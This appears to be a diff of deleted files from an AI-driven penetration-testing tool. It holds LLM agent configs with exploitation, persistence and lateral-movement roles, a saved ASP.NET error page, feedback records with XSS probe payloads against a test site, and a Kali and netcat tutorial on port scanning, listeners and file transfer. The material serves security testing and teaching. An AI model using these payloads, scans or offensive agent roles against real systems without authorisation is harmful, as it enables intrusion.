ViewState: /wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu
Referer:
Path: /Comments.aspx]
[HttpException (0x80004005): Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
http://go.microsoft.com/fwlink/?LinkID=314055]
System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) +190
System.Web.UI.ObjectStateFormatter.Deserialize(String inputString) +11093249
System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState) +59
System.Web.UI.HiddenFieldPageStatePersister.Load() +11093352
System.Web.UI.Page.LoadPageStateFromPersistenceMedium() +11178689
System.Web.UI.Page.LoadAllState() +46
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11174087
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11173626
System.Web.UI.Page.ProcessRequest() +91
System.Web.UI.Page.ProcessRequest(HttpContext context) +240
ASP.comments_aspx.ProcessRequest(HttpContext context) in c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +599
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +171
</pre></code>
</td>
</tr>
</table>
<br>
<hr width=100% size=1 color=silver>
<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.8974; ASP.NET Version:2.0.50727.8974
</font>
</body>
</html>
<!--
[ViewStateException]: Invalid viewstate.
Client IP: 177.62.32.16
Port: 56298
User-Agent: Mozilla/5.0
ViewState: /wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu
Referer:
Path: /Comments.aspx
[HttpException]: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
http://go.microsoft.com/fwlink/?LinkID=314055
at System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError)
at System.Web.UI.ObjectStateFormatter.Deserialize(String inputString)
at System.Web.UI.Util.DeserializeWithAssert(IStateFormatter formatter, String serializedState)
at System.Web.UI.HiddenFieldPageStatePersister.Load()
at System.Web.UI.Page.LoadPageStateFromPersistenceMedium()
at System.Web.UI.Page.LoadAllState()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.comments_aspx.ProcessRequest(HttpContext context) in c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
-116
View File
File diff suppressed because one or more lines are too long
-50
View File
@@ -1,50 +0,0 @@
{
"llm": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "",
"temperature": 0.7,
"max_tokens": 4096
},
"agents": {
"recon": {
"enabled": true,
"priority": 1
},
"exploitation": {
"enabled": true,
"priority": 2
},
"privilege_escalation": {
"enabled": true,
"priority": 3
},
"persistence": {
"enabled": true,
"priority": 4
},
"lateral_movement": {
"enabled": true,
"priority": 5
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-114
View File
@@ -1,114 +0,0 @@
{
"llm": {
"default_profile": "gemini_pro_default",
"profiles": {
"gemini_pro_default": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "${GEMINI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 30720,
"output_token_limit": 2048,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
}
}
},
"agent_roles": {
"pentest_generalist": {
"enabled": true,
"tools_allowed": [
"nmap",
"metasploit",
"burpsuite",
"sqlmap",
"hydra"
],
"description": "Performs comprehensive penetration tests across various domains.",
"methodology": ["OWASP-WSTG", "PTES", "OWASP-Top10-2021"],
"default_prompt": "auto_pentest",
"vuln_coverage": 100,
"ai_prompts": true
},
"bug_bounty_hunter": {
"enabled": true,
"tools_allowed": [
"subfinder",
"nuclei",
"burpsuite",
"sqlmap"
],
"description": "Focuses on web application vulnerabilities with 100 vuln types.",
"methodology": ["OWASP-WSTG", "OWASP-Top10-2021"],
"default_prompt": "auto_pentest",
"vuln_coverage": 100,
"ai_prompts": true
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"mcp_servers": {
"neurosploit_tools": {
"transport": "stdio",
"command": "python3",
"args": ["-m", "core.mcp_server"],
"description": "NeuroSploit pentest tools: screenshots, payload delivery, DNS, port scan, tech detect, subdomain enum, findings, AI prompts, Nuclei scanner, Naabu port scanner, sandbox execution"
}
},
"sandbox": {
"enabled": false,
"mode": "per_scan",
"image": "neurosploit-sandbox:latest",
"container_name": "neurosploit-sandbox",
"auto_start": false,
"kali": {
"enabled": true,
"image": "neurosploit-kali:latest",
"max_concurrent": 5,
"container_ttl_minutes": 60,
"auto_cleanup_orphans": true
},
"resources": {
"memory_limit": "2g",
"cpu_limit": 2.0
},
"tools": [
"nuclei", "naabu", "nmap", "httpx", "subfinder", "katana",
"dnsx", "ffuf", "gobuster", "dalfox", "nikto", "sqlmap",
"whatweb", "curl", "dig", "whois", "masscan", "dirsearch",
"wfuzz", "arjun", "wafw00f", "waybackurls"
],
"nuclei": {
"rate_limit": 150,
"timeout": 600,
"severity_filter": "critical,high,medium",
"auto_update_templates": true
},
"naabu": {
"rate": 1000,
"top_ports": 1000,
"timeout": 300
}
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-154
View File
@@ -1,154 +0,0 @@
{
"llm": {
"default_profile": "gemini_pro_default",
"profiles": {
"ollama_llama3_default": {
"provider": "ollama",
"model": "llama3:8b",
"api_key": "",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 8000,
"output_token_limit": 4000,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": false,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": null
},
"gemini_pro_default": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "${GEMINI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 30720,
"output_token_limit": 2048,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
},
"claude_opus_default": {
"provider": "claude",
"model": "claude-opus-4-6-20250918",
"api_key": "${ANTHROPIC_API_KEY}",
"temperature": 0.7,
"max_tokens": 16384,
"input_token_limit": 1000000,
"output_token_limit": 16384,
"cache_enabled": true,
"search_context_level": "high",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "self_reflection"
},
"gpt_4o_default": {
"provider": "gpt",
"model": "gpt-4o",
"api_key": "${OPENAI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 128000,
"output_token_limit": 4096,
"cache_enabled": true,
"search_context_level": "high",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
}
}
},
"agent_roles": {
"bug_bounty_hunter": {
"enabled": true,
"tools_allowed": [
"subfinder",
"nuclei",
"burpsuite",
"sqlmap"
],
"description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
},
"blue_team_agent": {
"enabled": true,
"tools_allowed": [],
"description": "Analyzes logs and telemetry for threats, provides defensive strategies."
},
"exploit_expert": {
"enabled": true,
"tools_allowed": [
"metasploit",
"nmap"
],
"description": "Devises exploitation strategies and payloads for identified vulnerabilities."
},
"red_team_agent": {
"enabled": true,
"tools_allowed": [
"nmap",
"metasploit",
"hydra"
],
"description": "Plans and executes simulated attacks to test an organization's defenses."
},
"replay_attack_specialist": {
"enabled": true,
"tools_allowed": [
"burpsuite"
],
"description": "Identifies and leverages replay attack vectors in network traffic or authentication."
},
"pentest_generalist": {
"enabled": true,
"tools_allowed": [
"nmap",
"subfinder",
"nuclei",
"metasploit",
"burpsuite",
"sqlmap",
"hydra"
],
"description": "Performs comprehensive penetration tests across various domains."
},
"owasp_expert": {
"enabled": true,
"tools_allowed": [
"burpsuite",
"sqlmap"
],
"description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
},
"cwe_expert": {
"enabled": true,
"tools_allowed": [],
"description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
},
"malware_analyst": {
"enabled": true,
"tools_allowed": [],
"description": "Examines malware samples to understand functionality and identify IOCs."
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-4
View File
@@ -1,4 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
-4
View File
@@ -1,4 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
-63
View File
@@ -1,63 +0,0 @@
{
"feedback": [
{
"vuln_id": "1b79cb50-2f1e-4ab2-a8bc-3de7b95f2fbc",
"vuln_type": "unknown",
"endpoint_pattern": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"param": "file",
"payload_pattern": "",
"is_true_positive": false,
"explanation": "did not trigger an XSS alert; this looks more like a possible Path Traversal",
"severity": "medium",
"domain": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"timestamp": "2026-02-16T20:41:38.817732"
},
{
"vuln_id": "836fd546-ee28-4869-a9fe-1c2cd37a3f41",
"vuln_type": "unknown",
"endpoint_pattern": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"param": "pp",
"payload_pattern": "",
"is_true_positive": false,
"explanation": "Looks more like DOM XSS",
"severity": "medium",
"domain": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"timestamp": "2026-02-16T20:42:01.342162"
}
],
"patterns": {
"unknown": [
{
"endpoint_pattern": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"vuln_type": "unknown",
"indicators": [
"file"
],
"is_false_positive": true,
"confidence": 0.5,
"feedback_count": 1,
"domain": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"explanation_summary": "did not trigger an XSS alert; this looks more like a possible Path Traversal",
"last_updated": "2026-02-16T20:41:38.817738"
},
{
"endpoint_pattern": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"vuln_type": "unknown",
"indicators": [
"pp"
],
"is_false_positive": true,
"confidence": 0.5,
"feedback_count": 1,
"domain": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"explanation_summary": "Looks more like DOM XSS",
"last_updated": "2026-02-16T20:42:01.342167"
}
]
},
"metadata": {
"total_feedback": 2,
"total_patterns": 2,
"last_updated": "2026-02-16T20:42:01.342235"
}
}
-22
View File
@@ -1,22 +0,0 @@
{
"documents": [
{
"id": "1c4cf70f-d4a",
"filename": "pentest.md",
"title": "Kali Linux Penetration Testing Fundamentals and Essential Tools",
"source_type": "md",
"uploaded_at": "2026-02-16T14:50:31.618020",
"processed": true,
"file_size_bytes": 20702,
"summary": "This document provides an introduction to Kali Linux as a penetration testing platform and covers fundamental Linux concepts. It discusses the differences between vulnerability assessments and penetration tests, emphasizes legal considerations including written authorization requirements, and introduces netcat as an essential networking tool for security testing.",
"vuln_types": [],
"knowledge_entries": []
}
],
"vuln_type_index": {
"information_disclosure": [],
"clickjacking": []
},
"version": "1.0",
"updated_at": "2026-04-28T19:00:40.997968"
}
@@ -1,344 +0,0 @@
----------
Chapter 1: Introduction
========
About Kali Linux
------------------------
> [Kali Linux](https://www.kali.org/) is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by [Offensive Security](http://www.offensive-security.com/), a leading information security training company.
Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of [BackTrack Linux](http://www.backtrack-linux.org/), adhering completely to Debian development standards.
Linux Basics
---------------
You should be aware of some basic Linux commands, which will come in handy throughout this guide. Only the basics are covered here; more detail can be found at this [link](https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-i-o-redirection).
**Streams**
Input and output in the Linux environment are distributed across three streams. These streams are:
standard input (stdin) # typically carries data from a user to a program
standard output (stdout) # writes the data that is generated by a program
standard error (stderr) # writes the errors generated by a program that has failed at some point in its execution
The streams are also numbered:
stdin (0) # cat
stdout (1) # echo
stderr (2)
**Stream Redirection**
Linux includes redirection commands for each stream. These commands redirect a stream to or from a file. If a non-existent file is targeted for output (by either a single-bracket or a double-bracket command), a new file with that name is created before writing.
Commands with a single bracket overwrite the destination's existing contents.
Overwrite
> - standard output
< - standard input
2> - standard error
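Commands with a double bracket do not overwrite the destination's existing contents.
Append
>> - standard output
2>> - standard error
Note that `<<` does not append to standard input: it starts a here-document, which feeds the inline text that follows (up to a delimiter) to the command's standard input.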
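
The difference between overwriting and appending can be sketched in Python. This is a minimal illustration, not part of the original guide: the helper `run_redirected` and the child one-liner `CHILD` are hypothetical names, and the child is a Python process rather than a shell command so the sketch does not depend on any particular shell.

```python
import subprocess
import sys
from pathlib import Path

# Hypothetical child program: writes one line to stdout and one to stderr.
CHILD = "import sys; print('to stdout'); print('to stderr', file=sys.stderr)"


def run_redirected(out_path: Path, err_path: Path, append: bool = False) -> int:
    """Run CHILD with stdout and stderr redirected to files.

    append=False mirrors `>` and `2>` (the file is truncated first);
    append=True mirrors `>>` and `2>>` (existing contents are kept).
    """
    mode = "a" if append else "w"
    with open(out_path, mode) as out, open(err_path, mode) as err:
        result = subprocess.run([sys.executable, "-c", CHILD], stdout=out, stderr=err)
    return result.returncode
```

Calling `run_redirected` twice with `append=False` leaves a single line in each file, while a further call with `append=True` adds a second line, which is the same behaviour the single and double brackets give in the shell.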
**Pipes**
Pipes (vertical bar `|`) are used to redirect a stream from one program to another. When a program's standard output is sent to another through a pipe, the first program's data, which is received by the second program, will not be displayed on the terminal. Only the filtered data returned by the second program will be displayed.
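
To make the data flow concrete, here is a rough Python equivalent of `producer | filter`. It is only a sketch: the helper name `pipe` is an assumption made for this example, and both sides of the pipe are small Python one-liners standing in for real commands.

```python
import subprocess
import sys


def pipe(producer_code: str, filter_code: str) -> str:
    """Connect the producer's stdout to the filter's stdin, like `a | b`.

    Only the filter's output is returned; the producer's raw output is
    never shown, just as it is not displayed on the terminal.
    """
    producer = subprocess.Popen(
        [sys.executable, "-c", producer_code], stdout=subprocess.PIPE
    )
    consumer = subprocess.Popen(
        [sys.executable, "-c", filter_code],
        stdin=producer.stdout,
        stdout=subprocess.PIPE,
        text=True,
    )
    # Close our copy so the producer sees a broken pipe if the filter exits early.
    producer.stdout.close()
    output, _ = consumer.communicate()
    producer.wait()
    return output
```

With a producer that prints `alpha`, `beta` and `gamma` and a filter that keeps lines containing `et`, only the `beta` line comes back, which mirrors what `grep` would do at the end of a shell pipeline.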
**Filters**
Filters are commands that alter piped redirection and output.
>Filter commands are also standard Linux commands that can be used without pipes.
* `find` - returns files with filenames that match the argument passed to find.
* `grep` - returns text that matches the string pattern passed to grep.
* `tee` - redirects standard input to both standard output and one or more files (typically used to view a program's output while simultaneously saving it to a file).
* `tr` - translates (replaces) or deletes individual characters.
* `wc` - counts characters, lines, and words.
About Penetration Testing
----------------------------------
**Vulnerability assessment:** simply identifies and reports noted vulnerabilities.
**Penetration test (pen test):** attempts to exploit the vulnerabilities to determine whether unauthorized access or other malicious activity is possible. Penetration testing typically includes network penetration testing and application security testing, as well as the controls and processes around the networks and applications, and should occur both from outside the network trying to come in (external testing) and from inside the network.
A penetration test is an authorised simulated attack on a computer system, performed to evaluate the security of the system. The test is performed to identify both weaknesses (also referred to as vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data, and strengths, enabling a full risk assessment to be completed.
***Penetration testing tools*** are used as part of a penetration test to automate certain tasks, improve testing efficiency and discover issues that might be difficult to find using manual analysis techniques alone. Two common categories of penetration testing tools are static analysis tools and dynamic analysis tools.
Legal
------
> As one might expect, there is a wealth of legal issues associated with information security. Whether it's a matter of preventing security breaches in order to maintain the security of your client information (or that of your organization), or simply realizing exactly how far one's obligations go when it comes to information security, it's important to understand exactly what your legal obligations are.
Because technology is ever-changing, there are always questions about what the legal protections might be when it comes to the misuse of new technology, or even what sort of jurisdiction might govern your organization or its clients. One of the biggest problems with computer crime is that laws still aren't clear as to who polices what online, if anything. As a result, companies must protect themselves against an attack on their internal servers and other information that might be at risk.
**Major Issues**
- One of the biggest issues organizations face in maintaining information security is that technology develops so quickly that it is hard for the legal system to keep up. Even if you have taken the time to amass evidence against those who may have breached your information security system, there are no guarantees that this evidence will even be admissible in a court of law.
- Penetration testing may affect system performance and can raise confidentiality and integrity issues. It is therefore very important to get permission in writing, even for an internal penetration test performed by internal staff. There should be a written agreement between the tester and the company, organization or individual that clarifies all points regarding data security, disclosure and so on before testing begins.
> One consideration that pen testers should be aware of is the laws surrounding the practice of port scanning.
You need to consider exactly how tightly your pen test will need to scan the systems that you are authorized to scan. Also, ensure you have permission to conduct the scan with a legitimate reason to do so; it is far easier to ask permission in this case than to beg forgiveness.
----------
Chapter 2: The Essential Tools
========
Netcat
--------
> This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.
Official website: http://nc110.sourceforge.net/
### Features
The original netcat's features include:
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally configured network source address
* Built-in port-scanning capabilities, with randomization
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Optional ability to let another program service establish connections
* Optional telnet-options responder
* Featured tunneling mode which permits user-defined tunneling, e.g., UDP or TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
#### The Basics
The most basic syntax is:
$ netcat [options] host port
This will attempt to initiate a TCP connection to the defined host on the port number specified. This functions similarly to the old Linux telnet command. Keep in mind that your connection is entirely unencrypted.
If you would like to send a UDP packet instead of initiating a TCP connection, you can use the -u option:
$ netcat -u host port
You can specify a range of ports by placing a dash between the first and last:
$ netcat host startport-endport
### Netcat for Port Scanning
One of the most common uses for netcat is as a port scanner.
$ netcat -z -v domain.com 1-10000
`-z` - perform a scan instead of attempting to initiate a connection.
`-v` - provide more verbose information.
`1-10000` - scan all ports from 1 up to 10000.
Output:
nc: connect to domain.com port 1 (tcp) failed: Connection refused
nc: connect to domain.com port 2 (tcp) failed: Connection refused
nc: connect to domain.com port 3 (tcp) failed: Connection refused
nc: connect to domain.com port 4 (tcp) failed: Connection refused
nc: connect to domain.com port 5 (tcp) failed: Connection refused
nc: connect to domain.com port 6 (tcp) failed: Connection refused
nc: connect to domain.com port 7 (tcp) failed: Connection refused
. . .
Connection to domain.com 22 port [tcp/ssh] succeeded!
. . .
Connection to domain.com 8000 port [tcp/*] succeeded!
> The scan will go much faster if you know the IP address that you need. You can then use the `-n` flag to specify that you do not need to resolve the IP address using DNS.
Another example:
Checking whether UDP ports (-u) 27010-27015 are open on 209.58.178.32 using zero mode I/O (-z)
$ nc -vzu 209.58.178.32 27010-27015
Connection to 209.58.178.32 27015 port [udp/*] succeeded!
\* For educational purposes only, I have used the IP of an open server for the game Counter-Strike.
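
What `-z` does for TCP can be approximated with a plain connect scan. The sketch below is an illustration only, not netcat's implementation: the function name `scan_ports` and the default timeout are assumptions, it covers TCP but not the UDP case shown above, and it should only be pointed at hosts you are authorised to scan.

```python
import socket


def scan_ports(host: str, ports, timeout: float = 0.5) -> dict:
    """TCP connect scan: map each port to True (open) or False (closed or filtered)."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 on success and an errno value otherwise,
            # so a refused connection does not raise an exception.
            results[port] = sock.connect_ex((host, port)) == 0
    return results
```

Passing an IP address rather than a hostname skips the DNS lookup, which is the same saving the `-n` flag gives netcat.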
### Communicate through Netcat
Netcat can listen on a port for connections and packets. This gives us the opportunity to connect two instances of netcat in a client-server relationship.
On one machine, you can tell netcat to listen to a specific port for connections. We can do this by providing the `-l` parameter and choosing a port:
$ netcat -l 4444
As a regular (non-root) user, you will not be able to open any ports under 1024, as a security measure.
On another machine, we'll connect to the first machine on the port number we chose:
$ netcat domain.com 4444
### File Transfer with NetCat
Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
Again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, we will place all of the information straight into a file.
$ netcat -l 4444 > received_file
On the other machine, transfer the file with:
$ netcat domain.com 4444 < original_file
For instance, we can transfer the contents of an entire directory by creating an unnamed tarball on-the-fly, transferring it to the remote system, and unpacking it into the remote directory.
On the receiving end, we can anticipate a file coming over that will need to be unzipped and extracted by typing:
$ netcat -l 4444 | tar xzvf -
The ending dash (`-`) means that tar will operate on standard input, which is being piped from netcat across the network when a connection is made.
On the side with the directory contents we want to transfer, we can pack them into a tarball and then send them to the remote computer through netcat:
$ tar -czf - * | netcat domain.com 4444
This time, the dash (`-`) in the tar command means to tar and zip the contents of the current directory (as specified by the `*` wildcard), and write the result to standard output.
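
The listen-then-redirect pattern used for file transfer can be sketched with plain sockets. This is a minimal illustration under stated assumptions: `receive_file`, `send_file` and `CHUNK` are names invented for this example, and, like netcat, the sketch sends the bytes unencrypted and unauthenticated.

```python
import socket
from pathlib import Path

CHUNK = 64 * 1024  # read/write size in bytes; an arbitrary choice


def receive_file(server: socket.socket, dest: Path) -> None:
    """Accept one connection and write everything received to dest."""
    conn, _addr = server.accept()
    with conn, open(dest, "wb") as out:
        while True:
            chunk = conn.recv(CHUNK)
            if not chunk:  # empty read: the sender closed the connection
                break
            out.write(chunk)


def send_file(host: str, port: int, src: Path) -> None:
    """Connect to host:port and stream the contents of src."""
    with socket.create_connection((host, port)) as conn, open(src, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                break
            conn.sendall(chunk)
```

The receiver plays the role of `netcat -l 4444 > received_file` and the sender the role of `netcat domain.com 4444 < original_file`; the transfer ends when the sender closes the connection.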
> use the `dd` command to image a disk on one side and transfer it to a remote computer.
### Netcat as a Simple Web Server
Create an HTML file `index.html` and serve it on the desired port (as before, a non-root user cannot bind to a port below 1024):
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888
This will serve the page, and then the netcat connection will close. If you attempt to refresh the page, it will be gone.
We can have netcat serve the page indefinitely by wrapping the last command in an infinite loop, as:
while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done
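
The same one-response-per-connection idea can be sketched in Python. This is an illustration rather than a replacement for a real web server: `serve_once` is a hypothetical helper, and unlike the `printf` one-liner it sends CRLF line endings and a `Content-Length` header, which stricter HTTP clients expect.

```python
import socket


def serve_once(server: socket.socket, body: bytes) -> None:
    """Accept a single connection, answer with body, then close it."""
    conn, _addr = server.accept()
    with conn:
        # Read the request headers before replying; the request itself is ignored.
        request = b""
        while b"\r\n\r\n" not in request:
            chunk = conn.recv(4096)
            if not chunk:
                break
            request += chunk
        headers = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Connection: close\r\n"
            "\r\n"
        ).encode("ascii")
        conn.sendall(headers + body)
```

Calling `serve_once` inside a `while True:` loop on a socket created with `socket.create_server(("", 8888))` gives the same effect as the shell loop above.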
----------
***Ncat***
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
Among Ncat's vast number of features are the ability to chain Ncats together, redirect both TCP and UDP ports to other sites, SSL support, and proxy connections via SOCKS4 or HTTP (CONNECT method) proxies (with optional proxy authentication as well). Some general principles apply to most applications and thus give you the capability of instantly adding networking support to software that would normally never support it.
----------
Wireshark
-------------
> Official document: https://www.wireshark.org/docs/wsug_html_chunked/
> Other helpful link(s):
> https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/
Wireshark is a network packet analyzer. A network packet analyzer captures network packets and displays the packet data in as much detail as possible.
Wireshark is a free application that allows you to capture and view the data traveling back and forth on your network, providing the ability to drill down and read the contents of each packet filtered to meet your specific needs. It is commonly utilized to troubleshoot network problems as well as to develop and test software. This open-source protocol analyzer is widely accepted as the industry standard, winning its fair share of awards over the years.
## Why use Wireshark?
- Network administrators use it to troubleshoot network problems
- Network security engineers use it to examine security problems
